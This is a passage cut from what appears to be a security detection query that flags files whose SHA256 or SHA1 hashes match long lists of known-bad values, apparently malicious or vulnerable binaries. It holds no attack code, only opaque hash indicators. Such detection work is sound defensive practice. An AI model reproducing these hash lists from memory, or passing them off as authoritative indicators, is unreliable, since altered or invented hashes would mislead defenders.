'%SHA256=4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374%' ESCAPE '\\' OR Hashes LIKE '%SHA256=06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de%' ESCAPE '\\' OR Hashes LIKE '%SHA256=314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890%' ESCAPE '\\' OR Hashes LIKE '%SHA256=19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200%' ESCAPE '\\' OR Hashes LIKE '%SHA256=677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993%' ESCAPE '\\' OR Hashes LIKE '%SHA256=082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003%' ESCAPE '\\' OR Hashes LIKE '%SHA256=26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15%' ESCAPE '\\' OR Hashes LIKE '%SHA256=543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433%' ESCAPE '\\' OR Hashes LIKE '%SHA256=da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec%' ESCAPE '\\' OR Hashes LIKE '%SHA256=771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230%' ESCAPE '\\' OR Hashes LIKE '%SHA256=97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893%' ESCAPE '\\') OR sha1 IN ('2261198385d62d2117f50f631652eded0ecc71db', '8db869c0674221a2d3280143cbb0807fac08e0cc', '27d3ebea7655a72e6e8b95053753a25db944ec0f', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '21e6c104fe9731c874fab5c9560c929b2857b918', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '2f991435a6f58e25c103a657d24ed892b99690b8', 'f02af84393e9627ba808d4159841854a6601cf80', 'bb962c9a8dda93e94fef504c4159de881e4706fe', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '6523b3fd87de39eb5db1332e4523ce99556077dc', '72966ca845759d239d09da0de7eebe3abe86fee3', '57511ef5ff8162a9d793071b5bf7ebe8371759de', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '1d0df45ee3fa758f0470e055915004e6eae54c95', 'd5fd9fe10405c4f90235e583526164cd0902ed86', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', '7d7c03e22049a725ace2a9812c72b53a66c2548b', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '468e2e5505a3d924b14fedee4ddf240d09393776', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', '078ae07dec258db4376d5a2a05b9b508d68c0123', '623cd2abef6c92255f79cbbd3309cb59176771da', '1f3a9265963b660392c4053329eb9436deeed339', 
'4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', 'c834c4931b074665d56ccab437dfcc326649d612', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', '51b60eaa228458dee605430aae1bc26f3fc62325', '3270720a066492b046d7180ca6e60602c764cac7', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', '19bd488fe54b011f387e8c5d202a70019a204adf', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '205c69f078a563f54f4c0da2d02a25e284370251', 'f9feb60b23ca69072ce42264cd821fe588a186a6', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '4e826430a1389032f3fe06e2cc292f643fb0c417', '7ab4565ba24268f0adadb03a5506d4eb1dc7c181', 'dc7b022f8bd149efbcb2204a48dce75c72633526', '0307d76750dd98d707c699aee3b626643afb6936', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', 'c948ae14761095e4d76b55d9de86412258be7afd', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', '745bad097052134548fe159f158c04be5616afc2', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'ac13941f436139b909d105ad55637e1308f49d9a', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', 'cc0e0440adc058615e31e8a52372abadf658e6b1', '5520ac25d81550a255dc16a0bb89d4b275f6f809', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '6003184788cd3d2fc624ca801df291ccc4e225ee', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 
'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '3abb9d0a9d600200ae19c706e570465ef0a15643', '27eab595ec403580236e04101172247c4f5d5426', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', '9c256edd10823ca76c0443a330e523027b70522d', '35829e096a15e559fcbabf3441d99e580ca3b26e', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '054a50293c7b4eea064c91ef59cf120d8100f237', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '14bf0eaa90e012169745b3e30c281a327751e316', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '879fcc6795cebe67718388228e715c470de87dca', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'd62fa51e520022483bdc5847141658de689c0c29', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', '3805e4e08ad342d224973ecdade8b00c40ed31be', '65d8a7c2e867b22d1c14592b020c548dd0665646', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '0b8b83f245d94107cb802a285e6529161d9a834d', 'c969f1f73922fd95db1992a5b552fbc488366a40', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'da9cea92f996f938f699902482ac5313d5e8b28e', 
'33285b2e97a0aeb317166cce91f6733cf9c1ad53', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 'f052dc35b74a1a6246842fbb35eb481577537826', 'f0c463d29a5914b01e4607889094f1b7d95e7aaf', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '7fb52290883a6b69a96d480f2867643396727e83', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '693a2645c28fc3b248fda95179c36c3ac64f6fc2', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', 'fe10018af723986db50701c8532df5ed98b17c39', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', '82ba5513c33e056c3f54152c8555abf555f3e745', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', 'bbc1e5fd826961d93b76abd161314cb3592c4436', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', 'b03b1996a40bfea72e4584b82f6b845c503a9748', 'c771ea59f075170e952c393cfd6fc784b265027c', 'cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1', '0918277fcdc64a9dc51c04324377b3468fa1269b', 'b09bcc042d60d2f4c0d08284818ed198cededa04', '8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89', '15df139494d2c40a645fb010908551185c27f3c5', '012db3a80faf1f7f727b538cbe5d94064e7159de', 'd04e5db5b6c848a29732bfd52029001f23c3da75', '490109fa6739f114651f4199196c5121d1c6bdf2', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', 'a87d6eac2d70a3fbc04e59412326b28001c179de', '3f223581409492172a1e875f130f3485b90fbe5f', '5db61d00a001fd493591dc919f69b14713889fc5', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', '9d07df024ec457168bf0be7e0009619f6ac4f13c', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'c6bd965300f07012d1b651a9b8776028c45b149a', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', 
'9c24dd75e4074041dbe03bf21f050c77d748b8e9', 'dc55217b6043d819eadebd423ff07704ee103231', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', 'c6d349823bbb1f5b44bae91357895dba653c5861', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', 'eb1ecad3d37bb980f908bf1a912415cff32e79e6', 'eb0d45aa6f537f5b2f90f3ad99013606eafcd162', '6053d258096bccb07cb0057d700fe05233ab1fbb', '29a190727140f40cea9514a6420f5a195e36386b', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', '99201c9555e5faf6e8d82da793b148311f8aa4b8', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', 'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', '943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 
'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', '7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 